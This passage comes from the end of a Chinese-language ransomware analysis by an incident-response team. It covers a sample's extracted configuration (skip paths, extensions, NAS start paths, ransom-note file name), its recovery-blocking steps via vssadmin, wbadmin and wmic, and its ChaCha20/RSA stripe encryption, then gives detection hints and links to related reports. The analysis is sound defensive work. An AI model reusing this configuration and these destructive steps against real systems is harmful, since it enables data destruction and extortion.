// Add subtle animation to stats\n document.addEventListener('DOMContentLoaded', function() {\n const statCards = document.querySelectorAll('.stat-card');\n statCards.forEach((card, index) => {\n setTimeout(() => {\n card.style.opacity = '1';\n card.style.transform = 'translateY(0)';\n }, 300 * index);\n });\n });\n </script>\n</body>\n</html>",
"requirementsFileName": "read_to_decrypt_files.html",
"skipExtensions": [
".dll",
".sys",
".readtext*",
".readtext95"
],
"skipPathes": [
"C:\\perflogs",
"C:\\Intel",
"C:\\HP",
"C:\\AMD",
"C:\\Dell",
"C:\\Drivers",
"C:\\inetpub",
"B:\\Boot",
"A:\\Boot",
"B:\\EFI",
"A:\\EFI",
"C:\\ProgramData\\Anydesk",
":\\Boot"
],
"startPathes": [
"/volume/",
"/vmfs/",
"/share/",
"/volumeusb/",
"/volume0/",
"/volume1",
"/volume2",
"/volumeUSB1",
"/volume3",
"/volume4",
"/volume5",
"/volume6",
"/shares"
],
"threadPool": true,
"threadPoolMaxThreads": 32,
"threadPoolPriorityExtensions": [
".sql",
".bak",
".VHDX"
]
}
Block模式是该勒索软件的一种智能队列管理和动态负载均衡机制,用于优化多线程加密性能并提供实时监控能力。通过智能队列管理系统将发现的文件先加入待处理队列,然后由动态调整的工作线程池批量处理,同时实时监控CPU使用率——当CPU占用超过90%时自动减少线程数避免系统卡顿,CPU空闲时则增加并发度提升加密速度
直接加密模式为直接对文件进行加密
4.1.8encrypt_single_file函数
4.1.9chacha20_encrypt_file_content
加密文件的核心函数,条状加密。
4.10 sub_14003CA40
rsa密钥对初始化
5.病毒分析概览
该样本属于具备典型勒索软件全链路特征的加密型威胁:感染后首先通过内置的 preRunCommands 杀死/停止数据库与备份相关进程并删除卷影副本(vssadmin/wbadmin/wmic 等)以阻断恢复路径,清空回收站并尝试修改引导恢复策略以增加破坏性;持久化通过添加启动项实现(add_to_startup);文件加密采用条状加密策略(每条 1136023 字节,累计加密上限 3853566 字节),对非黑名单后缀文件进行加密并在原名后追加扩展名 .blackheart588,加密内容使用 ChaCha20(本地随机 KEY 生成流程)配合内置 RSA 公钥进行密钥保护;
加密器以多线程/线程池(最多 32 线程,含 Block 模式的智能队列与动态负载均衡)遍历挂载盘并按排除路径跳过系统目录与特定厂商目录,运行时可显示加密进度窗口且支持更换桌面壁纸(可选);配置中包含固定 masterPublicKey、跳过路径/后缀列表、优先加密的扩展名与线程优先级规则,说明样本针对大型企业环境做了优化(优先停止 SQL/备份服务、并发加速、CPU 占用自调节)。
总体来看,该勒索样本在传播与破坏链路上以“阻断恢复 → 快速并发加密 → 密钥外包(RSA 保护)”为核心,易于通过监测异常 preRunCommands 调用、卷影删除、批量 taskkill/wbadmin 活动及大量 .blackheart588 新增文件名进行检测和响应。
以下是solar安全团队近期处理过的常见勒索病毒后缀:
| | | |
| — | — | — |
| 收录时间 | 病毒家族 | 相关文章 |
| 2025/01/14 | medusalocker | 【病毒分析】深入剖析MedusaLocker勒索家族:从密钥生成到文件加密的全链路解析 |
| 2025/01/15 | medusa | 【病毒分析】“美杜莎”勒索家族:从入侵到结束的全流程深度解析 |
| 2024/12/11 | weaxor | 【病毒分析】新崛起的weaxor勒索家族:疑似mallox家族衍生版,深度解析两者关联! |
| 2024/10/23 | RansomHub | 【病毒分析】Ransom Hub:唯一不攻击中国的2024全球Top1勒索家族——ESXi加密器深度解析 |
| 2024/11/23 | Fx9 | 【病毒分析】Fx9家族首次现身!使用中文勒索信,熟练勒索谈判 |
| 2024/11/04 | Makop | 【病毒分析】揭秘.mkp后缀勒索病毒!Makop家族变种如何进行可视化加密? |
| 2024/06/26 | moneyistime | 【病毒分析】使用中文勒索信及沟通:MoneyIsTime 勒索家族的本地化语言转变及其样本分析 |
| 2024/04/11 | babyk | 【病毒分析】BabyK加密器分析-Windows篇 【病毒分析】Babyk加密器分析-NAS篇 【病毒分析】Babyk加密器分析-EXSI篇 【病毒分析】Babuk家族babyk勒索病毒分析 【成功案例】利用多款国产内网渗透工具勒索数十台虚拟机的babyk解密恢复项目 |
| 2024/09/29 | lol | 【病毒分析】全网首发!全面剖析.LOL勒索病毒,无需缴纳赎金,破解方案敬请期待下篇! 【工具分享】.LOL勒索病毒再也不怕!完整破解教程分享+免费恢复工具首发 |
| 2024/06/10 | MBRlock | 【病毒分析】假冒游戏陷阱:揭秘MBRlock勒索病毒及其修复方法 |
| 2024/06/01 | Rast gang | 【病毒分析】Steloj勒索病毒分析 |
| 2024/06/01 | TargetOwner | 【病毒分析】技术全面升级,勒索赎金翻倍,新版本TargetOwner勒索家族强势来袭? |
| 2024/11/02 | Lockbit 3.0 | 【病毒分析】Lockbit家族Lockbit 3.0加密器分析 【成功案例】RDP暴露引发的蝴蝶效应:LockBit组织利用MSF工具及永恒之蓝漏洞进行勒索入侵 【成功案例】lockbit家族百万赎金不必付!技术手段修复被加密的数据库,附溯源分析报告 【病毒分析】繁体勒索信暗藏玄机!要价50万RMB赎金的Lockbit泄露版分析 |
| 2024/05/15 | wormhole | 【病毒分析】Wormhole勒索病毒分析 |
| 2024/03/20 | tellyouthepass | 【病毒分析】locked勒索病毒分析 【病毒分析】中国人不骗中国人?_locked勒索病毒分析 |
| 2024/03/01 | lvt | 【病毒分析】交了赎金也无法恢复–针对国内某知名NAS的LVT勒索病毒最新分析 |
| 2024/03/04 | phobos | 【病毒分析】phobos家族2700变种加密器分析报告 【成功案例】某集团公司的Phobos最新变种勒索病毒2700解密恢复项目 【病毒分析】phobos家族faust变种加密器分析 【成功案例】某集团公司的Phobos最新变种勒索病毒jopanaxye解密恢复项目 【病毒分析】phobos家族Elbie变种加密器分析报告 |
| 2024/03/28 | DevicData | 【病毒分析】DevicData勒索病毒分析 【病毒分析】DevicData家族扩散:全球企业和机构成为勒索病毒头号攻击目标! |
| 2024/02/27 | live | 【病毒分析】独家揭秘LIVE勒索病毒家族之1.0(全版本可解密) 【病毒分析】独家揭秘LIVE勒索病毒家族之1.5(全版本可解密) 【病毒分析】独家揭秘LIVE勒索病毒家族之2.0(全版本可解密) |
| 2024/08/16 | CryptoBytes | 【独家破解】揭秘境外黑客组织的20美元锁机病毒:深度逆向分析+破解攻略!赎金?给你付个🥚 |
| 2024/03/15 | mallox | 【病毒分析】mallox家族malloxx变种加密器分析报告 【病毒分析】Mallox勒索家族新版本:加密算法全面解析 【病毒分析】全网首发!袭扰国内top1勒索病毒家族Mallox家族破解思路及技术分享 【成功案例】间隔数月双团伙先后利用某ERP0day实施入侵和勒索的解密恢复项目 【病毒分析】mallox家族rmallox变种加密器分析报告 【病毒分析】Mallox家族再进化:首次瞄准Linux,勒索新版本全面揭秘! |
| 2024/07/25 | BeijngCrypt | 【病毒分析】全网首发!以国内某安全厂商名字为后缀的勒索病毒分析 |
| 2025/03/11 | 银狐 | 【病毒分析】潜伏在AI工具中的幽灵:银狐家族社工攻击的深度剖析 |
| 2025/03/07 | CTF赛题 | 【病毒分析】伪造微软官网+勒索加密+支付威胁,CTF中勒索病毒解密题目真实还原! 【病毒分析】2024年网鼎杯朱雀组REVERSE02——关于勒索木马解密详解 |
| 2025/05/14 | 888 | 【病毒分析】888勒索家族再出手!幕后加密器深度剖析 |
| 2025/06/13 | LockBit4.0 | 【病毒分析】缴纳了巨额赎金依旧无法解密?最新LockBit4.0解密器分析 【病毒分析】LockBit 4.0 vs 3.0:技术升级还是品牌续命?最新LockBit 4.0分析报告 |
勒索攻击作为成熟的攻击手段,很多勒索家族已经形成了一套完整的商业体系,并且分支了很多团伙组织,导致勒索病毒迭代了多个版本。而每个家族擅用的攻击手法皆有不同,TellYouThePass勒索软件家族常常利用系统漏洞进行攻击;Phobos勒索软件家族通过RDP暴力破解进行勒索;Mallox勒索软件家族利用数据库及暴力破解进行加密,攻击手法极多防不胜防。
| | |
| — | — |
| 收录时间 | 相关文章 |
| 2024/12/12 | 【攻击手法分析】勒索病毒如何轻松绕过安全设备防线:第二篇-流量致盲,无声突破 |
| 2024/12/11 | 【攻击手法分析】勒索病毒如何轻松绕过安全设备防线:第一篇-驱动漏洞一击致命 |
而最好的预防方法就是针对自身业务进行定期的基线加固、补丁更新及数据备份,在其基础上加强公司安全人员意识。
| | |
| — | — |
| 收录时间 | 相关文章 |
| 2024/06/27 | 【教程分享】勒索病毒来袭!教你如何做好数据防护 |
| 2024/06/24 | 【教程分享】服务器数据文件备份教程 |
案例介绍篇聚焦于真实的攻击事件,还原病毒家族的攻击路径和策略,为用户提供详细的溯源分析和防护启示;
| | |
| — | — |
| 收录时间 | 相关文章 |
| 2024/06/27 | 【案例介绍】赎金提高,防御失效:某上市企业两年内两度陷入同一勒索团伙之手 |
| 2024/01/26 | 【成功案例】某集团公司的Phobos最新变种勒索病毒jopanaxye解密恢复项目 |
| 2024-03-13 | 【成功案例】某集团公司的Phobos最新变种勒索病毒2700解密恢复项目 |
| 2024-04-01 | 【成功案例】间隔数月双团伙先后利用某ERP0day实施入侵和勒索的解密恢复项目 |
| 2024-04-26 | 【成功案例】利用多款国产内网渗透工具勒索数十台虚拟机的babyk解密恢复项目 |
| 2024-05-17 | 【成功案例】RDP暴露引发的蝴蝶效应:LockBit组织利用MSF工具及永恒之蓝漏洞进行勒索入侵 |
| 2024-11-28 | 【成功案例】lockbit家族百万赎金不必付!技术手段修复被加密的数据库,附溯源分析报告 |
漏洞与预防篇侧重于技术层面的防御手段,针对病毒利用的漏洞和安全弱点,提出操作性强的应对方案:
| | |
| — | — |
| 收录时间 | 相关文章 |
| 2025/01/08 | 【漏洞与预防】RDP弱口令漏洞预防 |
| 2025/01/21 | 【漏洞与预防】MSSQL数据库弱口令漏洞预防 |
| 2025/02/18 | 【漏洞与预防】远程代码执行漏洞预防 |
| 2025/04/10 | 【漏洞与预防】Atlassian Confluence存在远程代码执行漏洞 |
| 2025/04/17 | 【漏洞与预防】畅捷通文件上传漏洞预防 |
| 2025/05/27 | 【漏洞与预防】Microsoft Windows 文件资源管理器欺骗漏洞预防 |
应急响应工具教程篇重点分享应急响应过程中常用工具的安装、配置与使用说明,旨在帮助读者快速掌握这些工具的操作流程与技巧,提高其在实际应急场景中的应用熟练度与效率。
| | |
| — | — |
| 收录时间 | 相关文章 |
| 2025/01/10 | 【应急响应工具教程】Splunk安装与使用 |
| 2025/02/07 | 【应急响应工具教程】取证工具-Volatility安装与使用 |
| 2025/02/20 | 【应急响应工具教程】流量嗅探工具-Tcpdump |
| 2025/02/26 | 【应急响应工具教程】一款精准搜索文件夹内容的工具–FileSeek |
| 2025/03/03 | 【应急响应工具教程】一款自动化分析网络安全应急响应工具–FindAll |
| 2025/03/13 | 【应急响应工具教程】Windows 系统操作历史监控与审计工具-LastActivityView |
| 2025/03/20 | 【应急响应工具教程】镜像取证之挂载镜像——Arsenal Image Mounter |
| 2025/04/03 | 【应急响应工具教程】Windows 系统综合排查工具Hawkeye |
| 2025/04/08 | 【应急响应工具教程】Linux下应急响应工具whohk |
| 2025/05/15 | 【应急响应工具教程】Windows日志快速分析工具——Chainsaw |
| 2025/06/05 | 【应急响应工具教程】Logman 系统性能与日志采集工具 |
| 2025/07/02 | 【应急响应工具教程】QDoctor应急响应神器:一键检测系统安全 |
| 2025/07/08 | 【应急响应工具教程】Linux应急响应工具集:一键式安全评估与可视化报告系统 |
| 2025/07/23 | 【应急响应工具教程】司稽(Whoamifuck):纯Shell打造的Linux应急响应利器 |
| 2025/08/05 | 【应急响应工具教程】主机侧Checklist的自动全面化检测脚本-GScan |
| 2025/08/19 | 【应急响应工具教程】SPECTR3:通过便携式 iSCSI 实现远程证据的只读获取与分析 |
如果您想了解有关勒索病毒的最新发展情况,或者需要获取相关帮助,请关注“solar专业应急响应团队”。
全国热线| 400-613-6816
更多资讯| 扫码加入群组交流
喜欢此内容的人还喜欢
【紧急警示】Weaxor最新变种“.wxx”来袭,批量入国内知名财务类管理系统发起勒索攻击!
索勒安全团队
【紧急通告】Outlook公布高危漏洞CVE‑2025‑47176,攻击者可远程执行代码!
索勒安全团队
【应急响应工具教程】Linux应急响应工具集:一键式安全评估与可视化报告系统 索勒安全团队
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:solar应急响应团队 solarsec《【病毒分析】新版勒索病毒MEDUSA LOCKER 首发深度分析》